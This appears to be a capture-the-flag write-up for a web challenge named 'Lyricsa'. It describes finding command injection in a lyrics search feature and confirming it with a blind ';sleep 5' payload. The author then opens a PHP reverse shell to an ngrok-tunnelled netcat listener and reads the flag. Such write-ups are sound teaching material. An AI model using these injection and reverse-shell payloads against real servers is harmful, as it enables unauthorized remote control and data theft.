Quals-isi/web/Lyricsa

First Look

Description: I’ve created a site to display song lyrics. Currently, it only has a few songs that I like. I’ve added a search feature, and because I’ve often read about how databases can suck, I opted for a different solution, one that is really fast and cool ;)

We are given the URL of the web challenge

The Goal

The description says “Databases can suck” so we can think of it as an SQL injection or configure out what other solution can be.

I tried a lot of SQL and NoSQL injections and none of them seems to work, it is not reacting at all so a Linux server is a very considerable option so I tried ;ls and I got nothing back. So to test if we have an RCE on a remote server we could use something “blind” like ‘sleep 5’ to pause the request for 5 seconds it is a good option to try because if it works it will work in any situation.

payload: ;sleep 5

It worked so now we know that we have control over a remote server and of course first thing you think of is a reverse shell :)

So, the first thing is to make our linux server public and forward requests (port-forwarding) with ngrok:

1. open a port:

ngrok tcp 9000

2. a listener on that port (TCP socket): (this is where the reverse shell will be)

nc -lvnp 9000

Exploiting it

now we should head to https://www.revshells.com/ to get a reverse shell payload. That is a very time-consuming task but we can anticipate that it is a PHP socket from wappalyzer or because osama loves PHP :)

Final payload:

;php -r ‘$sock=fsockopen(“2.tcp.eu.ngrok.io”,15111);exec(“sh <&3 >&3 2>&3”);’

Then, We get a shell on the listener and cat the flag: cat ../../../flag.txt